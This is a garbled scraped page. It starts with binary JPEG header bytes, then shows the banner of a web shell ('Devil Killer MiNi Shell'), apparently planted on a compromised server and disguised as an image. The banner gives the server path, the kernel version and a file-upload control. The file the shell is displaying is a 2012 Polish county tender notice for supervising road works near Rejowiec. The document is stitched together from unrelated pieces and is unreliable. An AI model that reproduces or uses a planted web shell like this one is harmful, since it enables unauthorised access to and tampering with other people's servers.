JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120810/173223-N-2012.html

<p class="kh_header"><b>Chełm: Pełnienie nadzoru inwestorskiego nad zagospodarowaniem poscaleniowym- Projekt scalenia gruntów obrębu Leonów, gmina Rejowiec, powiat chełmski, województwo lubelskie</b><br>
<b>Numer ogłoszenia: 173223 - 2012; data zamieszczenia: 10.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Chełmie , Plac Niepodległości 1, 22-100 Chełm, woj. lubelskie, tel. 82 5627501, faks 82 5627510.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.chelmski.iap.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego nad zagospodarowaniem poscaleniowym- Projekt scalenia gruntów obrębu Leonów, gmina Rejowiec, powiat chełmski, województwo lubelskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie pełnego nadzoru inwestorskiego nad robotami branży drogowej dotyczącymi zagospodarowania poscaleniowego projektu pn. Projekt scalenia gruntów obrębu Leonów, gmina Rejowiec, powiat chełmski, województwo lubelskie. 
W trakcie realizacji zadania inwestycyjnego Wykonawca będzie sprawował funkcję nadzoru inwestorskiego w pełnym zakresie, wynikającym z art. 25 i 26 ustawy z dnia 7 lipca 1994 r. Prawo budowlane /Dz. U. z 2010 r., Nr 243, poz. 1623/ oraz będzie odpowiedzialny za  realizację zadania  i jego rozliczenie.  
Do zadań Wykonawcy w trakcie realizacji zadania należy w szczególności:
1.Prowadzenie nadzoru nad prawidłowym przebiegiem robót zgodnie z umową. 
2.Kontrola i dopilnowanie, aby wszystkie używane urządzenia i materiały posiadały stosowne świadectwa i certyfikaty wymagane przepisami i dokumentacją projektową.
3.Sprawdzenie ważności ubezpieczeń osób zatrudnionych oraz używanego sprzętu. 
4.Kontrola prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego.
5.Rozstrzyganie wątpliwości natury technicznej powstałych w toku prowadzonych robót, a w razie potrzeby zasięganie opinii autora projektu.
6.Uczestniczenie przy prowadzeniu przez Wykonawcę robót koniecznych prób, pomiarów i sprawdzeń.
7.Egzekwowanie od Wykonawcy dodatkowych badań i pomiarów względnie przeprowadzenia badań niezależnych w przypadku wątpliwości, co do wiarygodności badań Wykonawcy.
8.Wydawanie kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących: wykonywania prób, wymagających odkrycia robót lub elementów zakrytych. 
9.Kontrola i odbiór robót budowlanych ulegających zakryciu lub zanikających. 
10.Zawieszenie robót budowlanych w przypadku gdyby ich kontynuacja mogła wywołać zagrożenie życia lub zdrowia ludzi bądź spowodować znaczne straty materialne.
11.Kontrola i weryfikacja wszelkich przedkładanych przez Wykonawcę dokumentów.
12.Kontrola postępu wykonywanych robót.
13.Potwierdzenie faktycznie wykonanego zakresu robót jako podstawy do wystawienia faktury  zgodnie z postanowieniami umowy zawartej między Zamawiającym i wykonawcą robót budowlanych.
14.Weryfikacja, analizowanie i zatwierdzanie do zapłaty faktur wystawionych przez Wykonawcę robót budowlanych w związku z realizacją umowy na roboty budowlane.
15.Uzgadnianie z Wykonawcą robót budowlanych rodzaju dokumentacji powykonawczej, sprawdzanie jej i zatwierdzanie w porozumieniu z Zamawiającym.
16.Uczestnictwo w komisji odbioru końcowego inwestycji oraz komisjach odbiorów gwarancyjnych, w tym prowadzenie wraz z Zamawiającym przeglądów gwarancyjnych. Zamawiający zakłada, że w okresie gwarancyjnym przynajmniej raz na rok dokonywane będą przeglądy stanu technicznego wybudowanych i przebudowanych obiektów. 
17.Zarządzanie całym procesem przekazania obiektu do użytkowania.

Zakres robót objętych nadzorem inwestorskim obejmuje:
PRZEBUDOWA DROGI GMINNEJ I ZJAZDÓW:
I.ROBOTY PRZYGOTOWAWCZE I ROZBIÓRKOWE:
1.Roboty pomiarowe przy robotach ziemnych- trasa dróg w terenie równinnym- 0,38 km
2.Mechaniczne ścinanie drzew z karczowaniem pni o średnicy 16-25 cm- 9,00 szt.
3.Mechaniczne ścinanie drzew z karczowaniem pni o średnicy 46-55 cm- 1,00 szt.
4.Mechaniczne karczowanie krzaków i podszyć średnich od 31 % do 60 % powierzchni- 0,11 ha
5.Wywożenie dłużyc, karpiny i gałęzi na odległość do 2 km- 16,18 mp
II.ROBOTY ZIEMNE:
1.Roboty ziemne- wykopy wykonywane koparkami podsiębiernymi o poj. łyżki 0,40 m3 w gr. kat. III-IV z transp. urobku na odl. do 1 km sam. samowyład. (Według tabeli robót ziemnych oraz zasypanie zaniżenia na drodze gruntowej dz. nr 178)- 666,71 m3
2.Zasypanie wykopu jw. spycharkami z zagęszcz. mechanicznym (gr. warstwy w stanie luźnym 30 cm)- kat. gr. III-IV- 480,00 m3.
3.Mechaniczne plantowanie terenu spycharkami gąsienicowymi o mocy 74 kW (100) KM, pracujące na gruncie 3-4 kategorii- 400,00 m2
4.Plantowanie (obrobienie na czysto) skarp i korony poboczy w gr. kat. IV- 2 128,00 m2
5.Zagęszczenie nasypów w korpusie i poboczu drogi ubijakami mechanicznymi, grunty spoiste kat. III-IV- 334,34 m3
III.ROBOTY NAWIERZCHNIOWE:
1.Podbudowa pomocnicza z piasku stabilizowanego cementem wykonana w wytwórni RM=2,5 MPa gr. 22 cm pielęgnowana piaskiem i wodą- 1 630,23 m2
2.Podbudowa zasadnicza z kruszyw łamanych gr. 20 cm- 1 630,23 m2
3.Skropienie podbudowy i warstwy wiążącej asfaltem- 3 260,46 m2
4.Nawierzchnia z betonu asfaltowego o grubości 4 cm (warstwa wiążąca)- 1 584,72 m2
5.Dodatek za transport mieszanki mineralno- bitumicznej- 1 km ponad 5 km (dalsze 15 km)- 154,35 t
6.Nawierzchnie z mieszanek mineralno- bitumicznych asfaltowych o grubości 4 cm (warstwa ścieralna)- 1 539,20 m2
7.Dodatek za transport mieszanki mineralno- bitumicznej- 1 km ponad 5 km (dalsze 15 km)- 157,00 t.
IV.ZJAZDY DO POSESJI, DO PÓL I NA DROGĘ GRUNTOWĄ:
1.Roboty ziemne- wykopy wykonywane koparkami podsiębiernymi o poj. łyzki 0,40 m3 w gr. kat. III-IV z transp. urobku na odl. do 1 km sam. samowyład. (pod konstrukcję zjazdów)- 22,37 m3
2.Podbudowa pomocnicza z piasku stabilizowanego cementem wykonana w wytwórni RM=2,5 MPa gr. 22 cm pielęgnowana piaskiem i wodą- 111,84 m2
3.Podbudowa zasadnicza z kruszyw łamanych gr. 20 cm- 111,84 m2
4.Skropienie podbudowy i warstwy wiążącej asfaltem- 223,68 m2
5.Nawierzchnia z betonu asfaltowego o grubości 4 cm (warstwa wiążąca)- 109,92 m2
6.Dodatek za transport mieszanki mineralno- bitumicznej - 1 km ponad 5 km (dalsze 15 km)- 10,71 t
7.Nawierzchnie z mieszanek mineralno- bitumicznych asfaltowych o grubości 4 cm (warstwa ścieralna)- 108,00 m2
8.Dodatek za transport mieszanki mineralno- bitumicznej - 1 km ponad 5 km (dalsze 15 km)- 11,02 t
V.ELEMENTY ODWODNIENIA:
1.Roboty ziemne- wykopy wykonywane koparkami podsiębiernymi o poj. łyżki 0,40 m3 w gr. kat. III-IV z transp. urobku na odl. do 1 km sam. samowyład. (wykopanie rowu wzdłuż drogi na dz. Nr 64)- 144,00 m3
2.Części przelotowe prefabrykowanego przepustu drogowego rurowego jednootworowego z rur o śr. 60 cm (przepustu szlakowego)- 6,00 m
3.Odbudowy wlotów (wylotów) prefabrykowanych przepustów drogowych rurowych (przepustu szlakowego)- 1,94 m3
4.Przepusty rurowe pod zjazdami - ławy fundamentowe żwirowe- 8,21 m3
5.Przepusty rurowe pod zjazdami- rury betonowe o średnicy 60 cm- 24,00 m
6.Darniowanie skarp przy wlotach i wylotach przepustów zjazdowych i szlakowego- na płask bez humusu- 30,00 m2
7.Podbudowa pod ściek prefabrykowany z betonu B-10 wykonanego w wytwórni gr. 10 cm pielęgnowana piaskiem i wodą- 63,00 m2
8.Ścieki z elementów betonowych prefabrykowanych gr. 10 cm na podsypce cementowo- piaskowej- 130,00 m
9.Umocnienie skarp kanałów płytami prefabrykowanymi- 440,00 m2
VI.ELEMENTY OZNAKOWANIA:
1.Pionowe znaki drogowe- słupki z rur stalowych- 3,00 szt.
2.Pionowe znaki drogowe - znaki zakazu, nakazu, ostrzegawcze i informacyjne o pow. do 0,30 m2 (znaki A-7- 1 szt., D-1- 2 szt.)- 3,00 szt.
VII.ROBOTY WYKOŃCZENIOWE:
1.Humusowanie poboczy i skarp nowej drogi z obsianiem przy grubości warstwy humusu 5 cm- 2 128,00 m2
2.Oczyszczenie rowów z wyprofilowaniem dna i skarp z namułu gr. 20 cm- 270,00 m
3.Oczyszczenie przepustów śr. 0,6 m z namułu do 50 % jego średnicy- 20,00 m

BUDOWA PRZEPUSTÓW
I.ROBOTY PRZYGOTOWAWCZE I ROZBIÓRKOWE:
1.Roboty pomiarowe przy robotach ziemnych- trasa dróg w terenie równinnym- 0,05 km
2.Mechaniczne karczowanie krzaków i podszyć średnich od 31 % do 60 % powierzchni- 0,01 ha
3.Wywożenie dłużyc, karpiny i gałęzi na odległość do 2 km- 2,50 mp
II.ELEMENTY ODWODNIENIA:
1.Roboty ziemne - wykopy wykonywane koparkami podsiębiernymi o poj. łyżki 0,40 m3 w gr. kat. III-IV z transp. urobku na odl. do 1 km sam. samowyład. (wykop pod posadowienie przepustu)- 48,00 m3
2.Części przelotowe prefabrykowanego przepustu drogowego rurowego jednootworowego z rur o śr. 60 cm (przepustu szlakowego)- 18,00 m
3.Odbudowy wlotów (wylotów) prefabrykowanych przepustów  drogowych rurowych (przepustu szlakowego)- 5,83 m3
4.Darniowanie skarp przy wlotach i wylotach przepustu szlakowego- na płask bez humusu- 18,00 m2
III.ROBOTY WYKOŃCZENIOWE: oczyszczenie przepustów śr. 0,6 m z namułu do 50 % jego średnicy- 18,00 m

ODKRZACZANIE I OCZYSZCZANIE ROWÓW, RÓWNANIE DRÓG GRUNTOWYCH
I.ROBOTY PRZYGOTOWAWCZE I ROZBIÓRKOWE:
1.Roboty pomiarowe przy robotach ziemnych- trasa dróg w terenie równinnym- 1,44 km
2.Mechaniczne karczowanie krzaków i podszyć średnich od 31 % do 60 % powierzchni- 2,77 ha
3.Wywożenie karpiny i gałęzi na odległość do 2 km- 365,64 mp
II.ROBOTY ZIEMNE:
1.Roboty ziemne- wykopy wykonywane koparkami podsiębiernymi o poj. łyżki 0,40 m3 w gr. kat. III-IV z transp. urobku na odl. do 1 km sam. samowyład. (pozyskanie gruntu na zasypanie dołu na drodze gruntowej  w rejonie  dz. nr 105)- 750,00 m3
2.Zasypanie wykopu jw. spycharkami z zagęszcz. mechanicznym spycharkami (gr. warstwy w stanie luźnym 30 cm)- kat. gr. III-IV- 750,00 m3
3.Mechaniczne plantowanie terenu spycharkami gąsienicowymi o mocy 74 kW (100) KM, pracujące na gruncie 3-4 kategorii (wyrównywanie dró gruntowych)- 7 200,00 m2
III.ROBOTY WYKOŃCZENIOWE: oczyszczenie rowów z wyprofilowaniem dna i skarp z namułu gr. 20 cm- 2 730,00 m
ROBOTY TOWARZYSZĄCE: wykonanie inwentaryzacji geodezyjnej powykonawczej w wersji papierowej i elektronicznej - 1,00 kpl.
	Szczegółowy zakres robót i warunki realizacji określa dokumentacja techniczna stanowiąca Załącznik Nr 10  do SIWZ, tj. w szczególności:
1.Dokumentacja projektowa: projekt budowlany, przedmiar robót.
2.Szczegółowa specyfikacja techniczna wykonania i odbioru robót.

Zadanie realizowane jest w ramach działania Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowywaniem rolnictwa i leśnictwa przez scalanie gruntów  objętego Programem Rozwoju Obszarów Wiejskich 2007-2013..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żada od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed upływem  terminu składania ofert,   a jeżeli okres prowadzenia działalności  jest krótszy-  w tym okresie, wykonał co najmniej 1 usługę    o wartości nie mniejszej niż  40 000,00 zł brutto polegającą na nadzorze inwestorskim nad robotami branży drogowej w zakresie budowy lub przebudowy dróg  wraz  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługa została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien wykazać dysponowanie osobami:1 osobą do pełnienia funkcji Inspektora nadzoru  branży drogowej posiadającą ważne uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej oraz min. 24 miesięczny staż pracy na stanowisku inspektora nadzoru nad robotami branży drogowej.  Uprawnienia   budowlane  powinny być wydane zgodnie z ustawą z dnia  7 lipca 1994 r. Prawo budowlane.   W przypadku nabycia uprawnień w innym kraju niż Polska będą także uznawane kwalifikacje zawodowe nabyte w państwach członkowskich Unii Europejskiej  oraz państwach Europejskiego Obszaru Gospodarczego (European Economic Area- EEA)  i Konfederacji Szwajcarskiej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca polega  na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie  tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.  
Dopuszcza się możliwość złożenia oferty wspólnej przez dwóch lub więcej wykonawców w rozumieniu art. 23 ustawy. W przypadku złożenia oferty wspólnej każdy z wykonawców musi oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 pkt 1  oraz w art. 24 ustawy. Wymagania określone w art. 22 ust. 1 pkt 2, 3 i 4 ustawy Wykonawcy mogą spełniać wspólnie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy   w sprawie zamówienia publicznego. Dokumenty należy złożyć w formie oryginału lub kopi poświadczonej za zgodność z oryginałem przez Wykonawcę bądź upoważnionego przedstawiciela Wykonawcy, zgodnie  z treścią dokumentu określającego status Wykonawcy bądź treścią załączonego do oferty pełnomocnictwa.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty w zakresie:
1)terminu realizacji umowy gdy jest ona spowodowana:
a)warunkami atmosferycznymi uniemożliwiającymi wykonywanie robót (przez warunki atmosferyczne uniemożliwiające wykonywanie robót należy rozumieć warunki atmosferyczne w znaczny sposób odbiegające od warunków zwykle panujących o tej samej porze roku na terenie realizowania robót,
b)epidemią stwierdzoną przez uprawnione do tego organy,
c)siłą wyższą, 
d)wadami dokumentacji projektowej uniemożliwiającymi prawidłowe wykonanie przedmiotu umowy zgodnie z zasadami sztuki budowlanej i skutkującymi przerwą w realizacji robót budowlanych.
2)zmiany osób przewidzianych do realizacji zamówienia przez strony w przypadku zdarzeń takich jak: śmierć, choroba, ustanie stosunku pracy, zmiana zakresu obowiązków pod warunkiem, że zaproponowane osoby będą miały kwalifikacje nie niższe od osób wskazanych w umowie.
Zmiany umowy wymagają zgody Zamawiającego i Wykonawcy w formie sporządzonego na piśmie i podpisanego przez strony aneksu. Poza przypadkami wymienionymi wyżej Zamawiający nie przewiduje zmiany innych istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.chelmski.iap.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Chełmie
Plac Niepodległości 1
22-100 Chełm
I piętro, pokój Nr 85.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2012 godzina 11:00, miejsce: Starostwo Powiatowe w Chełmie
Plac Niepodległości 1
22-100 Chełm
I piętro, pokój Nr 127.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane jest w ramach działania Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowywaniem rolnictwa i leśnictwa przez scalanie gruntów  objętego Programem Rozwoju Obszarów Wiejskich 2007-2013..</p>
